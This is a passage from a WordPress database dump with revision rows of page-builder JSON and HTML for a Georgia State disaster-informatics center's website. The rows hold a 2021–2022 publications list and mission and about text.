Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','inherit','closed','closed','','612-revision-v1','','','2022-03-29 22:25:54','2022-03-30 02:25:54','',612,'https://gsudice.dataconn.net/?p=913',0,'revision','',0),(914,1,'2022-03-29 22:25:54','2022-03-30 02:25:54','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah. Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and Management\n in Rural Communities in Accra, Ghana: A Field Study Report.</p>\n <p><strong>2021</strong></p>\n <p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.</p>\n <p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n <p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n <p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n <p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n <p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n <p>O’Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n <p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n (pp. 1-6). IEEE.</p>\n <p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n (pp. 631-640). IEEE.</p>\n <p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n (pp. 505-506).</p>\n <p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n <p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n (S3) Workshop (pp. 1-2).</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted\n Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-29 22:25:54','2022-03-30 02:25:54','',608,'https://gsudice.dataconn.net/?p=914',0,'revision','',0),(920,1,'2022-03-29 22:26:08','2022-03-30 02:26:08','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','inherit','closed','closed','','612-revision-v1','','','2022-03-29 22:26:08','2022-03-30 02:26:08','',612,'https://gsudice.dataconn.net/?p=920',0,'revision','',0),(921,1,'2022-03-29 22:26:08','2022-03-30 02:26:08','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and\n Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\n <p><strong>2021</strong></p>\n <p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.</p>\n <p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n <p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n <p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n <p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n <p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n <p>O’Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n <p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n (pp. 1-6). IEEE.</p>\n <p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n (pp. 631-640). IEEE.</p>\n <p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n (pp. 505-506).</p>\n <p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n <p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n (S3) Workshop (pp. 1-2).</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted\n Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-29 22:26:08','2022-03-30 02:26:08','',608,'https://gsudice.dataconn.net/?p=921',0,'revision','',0),(927,1,'2022-03-31 23:37:54','2022-04-01 03:37:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c17\",\"index\":0,\"id\":\"122-c18\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c15\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c21\",\"parentId\":\"122-c20\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c20\",\"parentId\":\"122-c19\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c15\",\"index\":0,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c15\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-03-31 23:37:54','2022-04-01 03:37:54','',353,'https://gsudice.dataconn.net/?p=927',0,'revision','',0),(928,1,'2022-03-31 23:37:54','2022-04-01 03:37:54','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c15\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c16\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c16 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c17-outer\">\n <div data-colibri-id=\"122-c17\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c17 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c18\" class=\"h-global-transition-all 